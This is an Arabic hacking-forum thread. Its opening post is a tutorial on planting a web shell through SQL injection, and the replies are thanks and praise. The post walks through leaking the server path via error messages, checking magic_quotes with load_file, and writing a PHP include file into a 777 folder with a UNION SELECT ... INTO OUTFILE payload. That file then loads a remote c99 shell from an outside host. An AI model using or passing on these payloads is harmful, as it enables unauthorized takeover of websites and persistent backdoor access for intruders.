|
رفع الشل من خلال ثغرة السيكول SQL السلام عليكم ورحمة الله وبركاته اليوم بشرح لكم كيف ترفع الشل من خلال ثغره اسمها سيكول او sql و الطريقة كالتالي : أولا : يجب أن نعرف مسارنا على السرفر و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف -------------------------------------------------------------------- بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها ------------------------------------------------------------------- لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف ' و سيضهر لنا مسارنا على السرفر مع جملة الخطأ ----------------- مثال: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2 هذه جملة خطأ ومسارنا فيها.. و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد المهم نحفظ المسار و نتابع --------------- الآن نأتي لكيفية معرفة الmagic quotes on أو off لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة ب load_file('/') أي سيكون الإستغلال هكذا نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب http://www.target.com/file.php?id=-1...39,5,6,7,8,9 و نرى إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off و نستطيع مواصلة عملنا أما إذا كان ال magic quotes on فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة ------------------------------ طيب ضهر لنا الmagic quotes off ماذا نفعل ؟ ----------------------------- نبحث عن أي شيئ مصرح بتصريح 777 ----------------------------- و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية مثلا هذا مسار صورة www.target.com/images/image.jpg أي سيكون مسار الملف المصرح هو /images/ الذي يأتي بعد مسارنا على السرفر طبعا --------------------------------- نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه '<?include("$iraq"); ?>' و نضيف هذا الأمر في آخر السطر into+outfile+ ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة home/dudi/public_html/ ثم نضيف مسار الملف المصرح ب777 /images/ ثم اسم الملف المصاب المراد رفعه بإمتداد php مثلا example.php ------------------ ليكون الاستغلال كتالي كود PHP: www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php" الآن تم إشائ الملف المقصود و هو هنا www.target.com/images/example.php الآن المرحلة الأخيرة هي رفع الشل على صيغة txt وذلك بالتالي كود PHP: http://www.target.com/images/example...xt.tc/c99.txt? طبعا http://c99.txt.tc/c99.txt هو مسار الشل بصيغة txt مرفوع جاهز اتمنى اني كفييت ووفيت <~ هذا الشرح اهداء لـ فولكآنو بعد ماشفت شرحه smilies8 |
[align=center]بارك الله فيك شرح 100/100 لكن عندي ملاحظة صغيرة المرة القادمة عند كتابة الاكواد ضع وسم الاكواد لتكتب بطريقة صحيحة[/align] |
مشكور على الرد // انا ماعرف اكتب مواضيع عدل ف المنتديات ,, السمووحه على الاخطاء الكتابيه |
يعطيك العافــــــــيه يـ بطل.، تستاهل التقـيم.، ^_^ |
جيفارا.، اعذرني والله ماقدرت اقـيم. الصورهـ كبيره وماخذهـ كل اليسارر.، يعني التقيم مأيطلع عندي ولا والله تستاهل . الخمس نجوم يـ بطل |
حبيب مشكور على الشرح الرائع واما قصة الاكواد يمكنكم اخواني نسخه في مفكرة وسيظهر كما يجب وااااااااااااصل بلا فواصل |
مشكورين على الردود الحلوه ^^ |
هلا اخي وتسلم الايادي على الشرح الرائع واصل تم تقيم الموضوع |
مشكورين على التقييم يآشبآآب وان شاءالله بكون مبدع نفسس باقي الشباب |
رد: رفع الشل من خلال ثغرة السيكول SQL fdvoqnm |
| الساعة الآن 01:06 PM |
[ vBspiders.Com Network ]